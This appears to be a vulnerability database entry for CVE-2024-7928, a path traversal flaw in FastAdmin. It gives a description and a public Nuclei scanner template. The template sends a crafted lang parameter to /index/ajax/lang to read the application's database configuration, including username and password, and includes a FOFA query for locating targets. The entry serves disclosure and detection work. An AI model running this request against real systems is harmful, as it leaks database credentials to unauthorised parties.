CVE-2024-7928: FastAdmin < V1.3.4.20220530 - Path Traversal

日期: 2025-08-01 | 影响软件: FastAdmin | POC: 已公开

漏洞描述

A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.

PoC代码[已公开]

id: CVE-2024-7928

info:
  name: FastAdmin < V1.3.4.20220530 - Path Traversal
  author: s4e-io,Hel10-Web
  severity: medium
  description: |
    A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
  reference:
    - https://wiki.shikangsi.com/post/share/da0292b8-0f92-4e6e-bdb7-73f47b901acd
    - https://github.com/bigb0x/CVE-2024-7928
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7928
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-7928
    cwe-id: CWE-22
    epss-score: 0.90636
    epss-percentile: 0.99597
    cpe: cpe:2.3:a:fastadmin:fastadmin:1.3.3.20220121:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fastadmin
    product: fastadmin
    fofa-query: icon_hash="-1036943727"
  tags: cve,cve2024,fastadmin,lfi,vkev

http:
  - raw:
      - |
        GET /index/ajax/lang?lang=../../application/database HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'jsonpReturn('
          - '"password":'
          - '"username":'
          - '"database":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/javascript'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100effcceb6d9ec42cfd8568700dcbb76249d707a1f5ba8085e8fb334689d6015f802210098b86b9cf1779f8555b3cfd8237907bae957001f70b70e766c5f27a748edb6a9:922c64590222798bb761d5b6d8e72950

相关漏洞推荐